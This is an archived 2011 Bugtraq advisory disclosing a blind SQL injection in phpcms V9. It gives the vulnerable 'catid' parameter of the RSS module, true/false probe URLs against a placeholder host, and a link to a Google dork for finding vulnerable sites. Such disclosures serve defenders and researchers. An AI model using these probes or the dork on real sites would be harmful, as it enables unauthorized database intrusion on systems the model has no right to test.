| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <201101212312.p0LNC3fZ008512@www3.securityfocus.com> Date: Fri, 21 Jan 2011 16:12:03 -0700 From: eidelweiss@...dowslive.com To: bugtraq@...urityfocus.com Subject: phpcms V9 BLind SQL Injection Vulnerability ================================================================= phpcms V9 BLind SQL Injection Vulnerability ================================================================= Software: phpcms V9 Vendor: www.phpcms.cn Vuln Type: BLind SQL Injection Download link: http://www.phpcms.cn/2010/1229/326.html Author: eidelweiss contact: eidelweiss[at]windowslive[dot]com Home: www.eidelweiss.info Google Dork: http://www.exploit-db.com/ghdb/3676/ // check here ^_^ References: http://eidelweiss-advisories.blogspot.com/2011/01/phpcms-v9-blind-sql-injection.html ================================================================= exploit & p0c [!] index.php?m=content&c=rss&catid=[valid catid] Example p0c [!] http://host/index.php?m=content&c=rss&catid=10 <= True [!] http://host/index.php?m=content&c=rss&catid=-10 <= False [+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table) ================================================================= Nothing Impossible In This World Even Nobody`s Perfect ================================================================= =========================| -=[ E0F ]=- |=========================
Powered by blists - more mailing lists